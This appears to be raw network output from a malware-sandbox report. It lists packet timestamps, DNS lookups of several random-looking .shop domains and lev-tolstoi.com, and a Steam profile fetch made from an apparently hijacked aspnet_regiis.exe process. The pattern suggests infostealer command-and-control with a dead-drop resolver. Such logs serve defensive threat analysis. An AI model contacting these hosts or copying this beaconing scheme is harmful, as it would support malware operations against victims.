                                                                                                                                                                                                                                          Dec 18, 2024 14:46:44.969641924 CET49732443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:44.969666004 CET44349732172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:44.969677925 CET49732443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:44.969682932 CET44349732172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:44.973639011 CET49733443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:44.973685026 CET44349733172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:44.973757029 CET49733443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:44.974087954 CET49733443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:44.974101067 CET44349733172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:46.202330112 CET44349733172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:46.202440977 CET49733443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:46.240297079 CET49733443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:46.240319014 CET44349733172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:46.241204977 CET44349733172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:46.242422104 CET49733443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:46.242477894 CET49733443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:46.242575884 CET44349733172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:53.381373882 CET44349733172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:53.381453037 CET44349733172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:53.381505013 CET44349733172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:53.381598949 CET49733443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:53.381618977 CET44349733172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:53.381686926 CET49733443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:53.389286995 CET44349733172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:53.397707939 CET44349733172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:53.397770882 CET49733443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:53.397780895 CET44349733172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:53.406507969 CET44349733172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:53.410543919 CET49733443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:53.410571098 CET44349733172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:53.415354013 CET44349733172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:53.418601036 CET49733443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:53.418616056 CET44349733172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:53.466864109 CET49733443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:53.500912905 CET44349733172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:53.546288967 CET49733443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:53.572824001 CET44349733172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:53.577403069 CET44349733172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:53.577455997 CET49733443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:53.577471972 CET44349733172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:53.577516079 CET44349733172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:53.577714920 CET49733443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:53.578305960 CET49733443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:53.578315973 CET44349733172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:53.733616114 CET49735443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:53.733668089 CET44349735172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:53.733905077 CET49735443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:53.734277010 CET49735443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:53.734293938 CET44349735172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:54.945405960 CET44349735172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:54.945532084 CET49735443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:54.946974039 CET49735443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:54.946980953 CET44349735172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:54.947232008 CET44349735172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:54.948652983 CET49735443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:54.948808908 CET49735443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:54.948846102 CET44349735172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:54.948920012 CET49735443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:54.948929071 CET44349735172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:59.011632919 CET44349735172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:59.011941910 CET44349735172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:59.012005091 CET49735443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:59.024312973 CET49735443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:59.024324894 CET44349735172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:59.260644913 CET49740443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:59.260678053 CET44349740172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:59.260826111 CET49740443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:59.261198044 CET49740443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:59.261217117 CET44349740172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:00.482166052 CET44349740172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:00.482295990 CET49740443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:00.483839989 CET49740443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:00.483844995 CET44349740172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:00.484146118 CET44349740172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:00.493776083 CET49740443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:00.493947029 CET49740443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:00.493974924 CET44349740172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:03.434350967 CET44349740172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:03.434463978 CET44349740172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:03.434632063 CET49740443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:03.435252905 CET49740443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:03.435271978 CET44349740172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:03.840703011 CET49742443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:03.840754986 CET44349742172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:03.840950966 CET49742443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:03.841192961 CET49742443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:03.841202974 CET44349742172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:05.081713915 CET44349742172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:05.081834078 CET49742443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:05.085959911 CET49742443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:05.085971117 CET44349742172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:05.086219072 CET44349742172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:05.094851971 CET49742443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:05.095072031 CET49742443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:05.095107079 CET44349742172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:05.095217943 CET49742443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:05.095230103 CET44349742172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:08.324103117 CET44349742172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:08.324405909 CET44349742172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:08.324528933 CET49742443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:08.324549913 CET49742443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:09.152360916 CET49743443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:09.152411938 CET44349743172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:09.152496099 CET49743443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:09.152844906 CET49743443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:09.152863026 CET44349743172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:10.368797064 CET44349743172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:10.368911982 CET49743443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:10.370497942 CET49743443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:10.370513916 CET44349743172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:10.370775938 CET44349743172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:10.396683931 CET49743443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:10.396770954 CET49743443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:10.396830082 CET44349743172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:11.299897909 CET44349743172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:11.300002098 CET44349743172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:11.300085068 CET49743443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:11.300345898 CET49743443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:11.300364017 CET44349743172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:12.091758966 CET49744443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:12.091825962 CET44349744172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:12.091934919 CET49744443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:12.096232891 CET49744443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:12.096247911 CET44349744172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:13.323653936 CET44349744172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:13.323734999 CET49744443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:13.325197935 CET49744443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:13.325211048 CET44349744172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:13.325450897 CET44349744172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:13.327764988 CET49744443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:13.328587055 CET49744443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:13.328646898 CET44349744172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:13.329355955 CET49744443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:13.329402924 CET44349744172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:13.329518080 CET49744443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:13.329560995 CET44349744172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:13.330602884 CET49744443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:13.330635071 CET44349744172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:13.330981970 CET49744443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:13.331013918 CET44349744172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:13.331176043 CET49744443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:13.331204891 CET44349744172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:13.331217051 CET49744443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:13.331227064 CET44349744172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:13.331370115 CET49744443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:13.331384897 CET44349744172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:13.331415892 CET49744443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:13.331538916 CET49744443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:13.331573009 CET49744443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:13.379343987 CET44349744172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:13.379637003 CET49744443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:13.379669905 CET44349744172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:13.379698038 CET49744443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:13.379719019 CET44349744172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:13.379781008 CET49744443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:13.379798889 CET44349744172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:16.066030025 CET44349744172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:16.066123962 CET44349744172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:16.066258907 CET49744443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:16.066637039 CET49744443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:16.066656113 CET44349744172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:16.086880922 CET49745443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:16.086920977 CET44349745172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:16.087042093 CET49745443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:16.087410927 CET49745443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:16.087424994 CET44349745172.67.157.254192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:47:16.248483896 CET49745443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:36.278476954 CET5204353192.168.2.41.1.1.1
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:36.579740047 CET53520431.1.1.1192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:36.582166910 CET5406353192.168.2.41.1.1.1
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:36.812669039 CET53540631.1.1.1192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:36.816299915 CET4996053192.168.2.41.1.1.1
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:37.038902044 CET53499601.1.1.1192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:37.043037891 CET5199553192.168.2.41.1.1.1
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:37.343372107 CET53519951.1.1.1192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:37.349272013 CET5145053192.168.2.41.1.1.1
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:37.575891972 CET53514501.1.1.1192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:37.578557014 CET6297253192.168.2.41.1.1.1
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:37.862560034 CET53629721.1.1.1192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:37.868269920 CET6137653192.168.2.41.1.1.1
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:38.085628033 CET53613761.1.1.1192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:38.089179039 CET5683753192.168.2.41.1.1.1
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:38.315058947 CET53568371.1.1.1192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:38.319715977 CET5857153192.168.2.41.1.1.1
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:38.552452087 CET53585711.1.1.1192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:38.555903912 CET6157053192.168.2.41.1.1.1
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:38.694291115 CET53615701.1.1.1192.168.2.4
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:41.132972002 CET5568253192.168.2.41.1.1.1
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:41.420648098 CET53556821.1.1.1192.168.2.4
                                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:36.278476954 CET192.168.2.41.1.1.10x77cdStandard query (0)weaknessmznxo.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:36.582166910 CET192.168.2.41.1.1.10x3e96Standard query (0)potentioallykeos.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:36.816299915 CET192.168.2.41.1.1.10x4071Standard query (0)interactiedovspm.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:37.043037891 CET192.168.2.41.1.1.10xa772Standard query (0)charecteristicdxp.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:37.349272013 CET192.168.2.41.1.1.10x9f10Standard query (0)cagedwifedsozm.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:37.578557014 CET192.168.2.41.1.1.10xf871Standard query (0)deicedosmzj.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:37.868269920 CET192.168.2.41.1.1.10xd491Standard query (0)southedhiscuso.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:38.089179039 CET192.168.2.41.1.1.10xdd36Standard query (0)consciousourwi.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:38.319715977 CET192.168.2.41.1.1.10xae1cStandard query (0)weiggheticulop.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:38.555903912 CET192.168.2.41.1.1.10x3d10Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:41.132972002 CET192.168.2.41.1.1.10x9286Standard query (0)lev-tolstoi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:36.579740047 CET1.1.1.1192.168.2.40x77cdName error (3)weaknessmznxo.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:36.812669039 CET1.1.1.1192.168.2.40x3e96Name error (3)potentioallykeos.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:37.038902044 CET1.1.1.1192.168.2.40x4071Name error (3)interactiedovspm.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:37.343372107 CET1.1.1.1192.168.2.40xa772Name error (3)charecteristicdxp.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:37.575891972 CET1.1.1.1192.168.2.40x9f10Name error (3)cagedwifedsozm.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:37.862560034 CET1.1.1.1192.168.2.40xf871Name error (3)deicedosmzj.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:38.085628033 CET1.1.1.1192.168.2.40xd491Name error (3)southedhiscuso.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:38.315058947 CET1.1.1.1192.168.2.40xdd36Name error (3)consciousourwi.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:38.552452087 CET1.1.1.1192.168.2.40xae1cName error (3)weiggheticulop.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:38.694291115 CET1.1.1.1192.168.2.40x3d10No error (0)steamcommunity.com23.55.153.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:41.420648098 CET1.1.1.1192.168.2.40x9286No error (0)lev-tolstoi.com172.67.157.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Dec 18, 2024 14:46:41.420648098 CET1.1.1.1192.168.2.40x9286No error (0)lev-tolstoi.com104.21.66.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          • steamcommunity.com
                                                                                                                                                                                                                                          • lev-tolstoi.com
                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          0192.168.2.44973123.55.153.1064437408C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-12-18 13:46:40 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                          Host: steamcommunity.com
                                                                                                                                                                                                                                          2024-12-18 13:46:40 UTC1905INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                          Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          Date: Wed, 18 Dec 2024 13:46:40 GMT
                                                                                                                                                                                                                                          Content-Length: 35121
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Set-Cookie: sessionid=77c8bb6ecdd504c2aa2c5b99; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                          Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                          2024-12-18 13:46:40 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
